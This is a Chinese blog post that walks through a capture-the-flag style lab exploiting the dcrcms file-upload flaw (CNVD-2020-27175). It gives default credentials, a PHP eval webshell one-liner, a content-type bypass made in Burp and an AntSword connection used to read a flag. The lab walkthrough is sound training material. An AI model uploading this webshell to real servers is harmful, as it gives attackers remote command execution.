文件上传漏洞--dcrcms

最新推荐文章于 2024-09-05 11:53:36 发布
最新推荐文章于 2024-09-05 11:53:36 发布
阅读量398 收藏 8
点赞数 11
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134621166
版权

vulfocus 文件上传来练习

启动dcrcms

访问80端口的登录界面

账号:admin 密码:123456

找到导入模版里文件上传,上传一句话木马

<?php @eval($_REQUEST[777]) ?>

bp拦截之后,开始导入

将类型改为:image/jpeg之后,上传

在文件管理器的如下地址中找到上传的一句话木马

中国蚁剑连接

地址为:http://10.9.47.6:62831/uploads/cache/2023_10_27/2310270310168430.php

密码为:777

进入虚拟终端,在/tmp下找到flag

奋斗的马喽
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现-dcrCms-文件上传】vulfocus/dcrcms-cnvd_2020_27175
10-10 2118
文件上传】修改文件类型
dcrcms文件上传(cnvd-2020-27175)
m0_65150886的博客
01-24 641
稻草人企业站是一款基于PHP+Sqlite/MySQL的开源简单小巧的免费企业网站系统。2.访问http://ip:port/dcr/login.htm,进入登录页面。稻草人企业站1.1.5存在文件上传漏洞,攻击者可利用漏洞获取服务器控制权。1.访问http://ip:port,出现如下页面,开始实验。5.回到后台首页----->添加新闻。7.点击添加新闻,并通过burp抓包。8.在重发器中,修改文件类型,并发包。10.蚁剑连接,getshell。密 码: 123456。4.填写分类名并添加分类。
dcrcms 文件上传漏洞(CNVD-2020-27175)
xy_wjyjw的博客
10-26 270
点击系统管理——文件管理器——uploads——cache——2023_10_27——2310270510021439.php。连接成功后打开虚拟终端,输入dir /tmp命令,就可以找到flag。在bp网站的地址栏输入10.9.47.6:31911/dcr。登录进入后台,点击模板管理——导入模板——选择模板配置文件。dcrcms 文件上传漏洞。回到浏览器发现更新配置成功。打开蚁剑,并添加数据。
dcrcms 文件上传漏洞
一个努力学习网安的小牛马
10-26 115
启动靶场得到ip和映射端口。
漏洞复现-jquery-文件上传】vulfocus/jquery-cve_2018_9207
10-07 2067
【jquery-文件上传
漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1843
【EmpireCms-文件上传】帝国建站
漏洞复现-phpok-文件上传】vulfocus/phpok-cve_2018_12491
10-10 1040
文件上传自解析】
漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933
10-16 3679
【dedecms-文件上传】后缀
漏洞复现-Apache-文件上传】vulfocus/apache-cve_2017_15715
10-09 2655
【Apache-文件上传
漏洞复现-TypesetterCms-文件上传ZIP】vulfocus/typesetter-cve_2020_25790
10-10 1030
【压缩后门文件上传
Web安全渗透学习-文件上传漏洞-附件资源
03-02
Web安全渗透学习-文件上传漏洞-附件资源
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 763
Web安全--文件上传--绕过--php
【网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1541
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 259
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
【补-网络安全】日常运维(二)终端端口占用排查
Ryoujou的博客
09-02 276
端口占用及开放情况
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 1120
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【网络安全漏洞挖掘
anquan2233的博客
08-29 1574
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 746
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞
人工智能在网络安全中的重要性
最新发布
wholeliubei的博客
09-05 275
人工智能(AI)是计算机科学的一个分支,基于某些独特的算法和相关数学计算,使机器能够拥有人类的决策能力。另一方面,网络安全包括保护虚拟世界免受网络攻击和威胁的安全措施。人工智能能够通过采取与精确算法和数学计算相关的安全措施来保护和清理网络空间。随着人工智能在现代世界中的作用增加,对网络安全的威胁已成为一个严重的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值